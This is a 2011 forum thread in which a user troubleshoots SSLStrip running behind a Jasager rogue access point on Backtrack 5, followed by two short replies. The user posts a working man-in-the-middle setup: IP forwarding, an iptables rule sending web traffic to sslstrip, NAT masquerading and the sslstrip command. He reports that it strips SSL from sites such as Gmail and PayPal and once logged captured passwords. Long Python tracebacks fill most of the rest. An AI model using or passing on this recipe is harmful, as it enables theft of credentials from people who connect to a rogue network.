bobbyb1980 Posted September 12, 2011 Posted September 12, 2011 Hello all. I was having some problems with SSL Strip 0.8 and Backtrack 5. What I am trying to do is use Jasager on an Open Mesh router configured with ICS and use SSL Strip from there. I am currently using the jasagerPwn script to do this, and the actual internet connection sharing works perfectly. What does not work so well is SSL Strip. As soon as I start SSL Strip the connection lags for a minute or so, then completely dies. Sometimes I am able to get it working for a few minutes, but it almost eventually always dies. This is the error I always receive upon start/termination of the connection: logging.warning("Host resolution error: " + error) exceptions/TypeError: cannot conatenate 'str' and 'instance' objects I noticed that on the latest version of Backtrack 5 SSLStrip 0.8 is installed so I tried to install 0.9. I used apt-get remove sslstrip and ti told me it successfully removed, but it did not. When I downloaded sslstrip 0.9 and tried to run the install.ph script, it tells me "Permission Denied" despite the fact that I am root. I cannot get the install script to run in BT5 no matter how many times I su the session. Considering I switched to BT5 from Ubuntu I'd like to avoid switching OS's and find a solution to the problem. I've found a few topics about this issue across the internet but none seem to offer a solution. Anyone have any ideas? Quote
Jamo Posted September 12, 2011 Posted September 12, 2011 (edited) To run that script you must make it executable, chmod +x filename and then ./filename. What commands do you use to run sslstrip? And. Are you running it on bt5 or jasager router? If on bt5 what commands do you use? Edited September 12, 2011 by Jarmo Quote
bobbyb1980 Posted September 12, 2011 Author Posted September 12, 2011 (edited) I stopped using the jasagerPwn script and manually configured ICS which seems to have a little more stability. Here are the settings used to configure ICS (ICS works fine). uci set network.lan.ipaddr=172.20.0.2 uci set network.lan.gateway=172.20.0.1 uci set network.lan.dns=192.168.1.254 uci commit network Here are the routing settings and what I use to run SSLStrip (SSLStrip is run from the attacker machine and not router) echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE sudo ifconfig eth0 172.20.0.1 netmask 255.255.255.0 sudo dhclient wlan0 sslstrip -l 64123 -f sslstrip-0.8/lock.ico Now I can share internet fine and I can go to websites like gmail.com or paypal.com and there will be no SSL. I have succeeded one time in getting passwords to print to the ssl logfile but I get the following error. Sometimes it still continues logging after the error, sometimes no. I just got it working in the past few hours so I need to test it further. I should also note that as previously mentioned I tried to uninstall sslstrip-0.8 (don't know whether it suceeded) and install sslstrip-0.9 (after chmodding the script I was able to run the install script, but it did not do anything, just a blinking cursor). However, I can run sslstrip-0.9 without installing it seemingly fine (however I do get the following error) sslstrip -l 64123 -f sslstrip 0.8 by Moxie Marlinspike running... Traceback (most recent call last): File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite why = getattr(selectable, method)() File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead return self.protocol.dataReceived(data) File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived return self.rawDataReceived(data) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived self.handleResponseEnd() File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 110, in handleResponseEnd HTTPClient.handleResponseEnd(self) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd self.handleResponse(B) File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 121, in handleResponse self.shutdown() File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 141, in shutdown self.client.finish() File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish "Request.finish called on a request after its connection was lost; " exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this. ^CTraceback (most recent call last): File "/usr/lib/python2.6/dist-packages/twisted/internet/defer.py", line 213, in addCallbacks self._runCallbacks() File "/usr/lib/python2.6/dist-packages/twisted/internet/defer.py", line 371, in _runCallbacks self.result = callback(self.result, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 409, in _continueFiring callable(*args, **kwargs) File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 595, in disconnectAll failure.Failure(main.CONNECTION_LOST)) --- <exception caught here> --- File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost Connection.connectionLost(self, reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost protocol.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost self.handleResponseEnd() File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 110, in handleResponseEnd HTTPClient.handleResponseEnd(self) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd self.handleResponse(B) File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 121, in handleResponse self.shutdown() File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 141, in shutdown self.client.finish() File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish "Request.finish called on a request after its connection was lost; " exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this. Any ideas would be greatly appreciated. Edited September 12, 2011 by bobbyb1980 Quote
abs0lut3z33r0 Posted February 6, 2012 Posted February 6, 2012 I also get the same error . Did you get solution to this problem? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.